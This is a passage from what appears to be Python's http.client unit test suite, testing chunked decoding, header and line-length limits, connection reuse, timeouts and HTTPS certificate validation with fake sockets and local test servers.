self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile(io.TextIOBase):
mode = 'r'
d = data()
def read(self, blocksize=-1):
return next(self.d)
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_blocksize_request(self):
"""Check that request() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.request("PUT", "/", io.BytesIO(expected), {"Content-Length": "9"})
self.assertEqual(sock.sendall_calls, 3)
body = sock.data.split(b"\r\n\r\n", 1)[1]
self.assertEqual(body, expected)
def test_blocksize_send(self):
"""Check that send() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.send(io.BytesIO(expected))
self.assertEqual(sock.sendall_calls, 2)
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test HTTPResponse with no \r\n termination.
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
serv = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
self.addCleanup(serv.close)
serv.bind((HOST, 0))
serv.listen()
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join, float(1))
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
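        # Gather chunks from readfunc() until a newline shows up or `limit`
        # bytes have been collected; anything past the newline is kept in
        # self.remainder for the next call.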
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # White-list documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'MISDIRECTED_REQUEST',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.source_port = support.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with support.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(context.check_hostname, True)
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
h.request('GET', '/')
resp = h.getresponse()
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_list_body(self):
# Note that no content-length is automatically calculated for
# an iterable. The request will fall back to send chunked
# transfer encoding.
cases = (
([b'foo', b'bar'], b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
((b'foo', b'bar'), b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
)
for body, expected in cases:
with self.subTest(body):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket('')
self.conn.request('PUT', '/url', body)
msg, f = self.get_headers_and_fp()
self.assertNotIn('Content-Type', msg)
self.assertNotIn('Content-Length', msg)
self.assertEqual(msg.get('Transfer-Encoding'), 'chunked')
self.assertEqual(expected, f.read())
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_text_file_body(self):
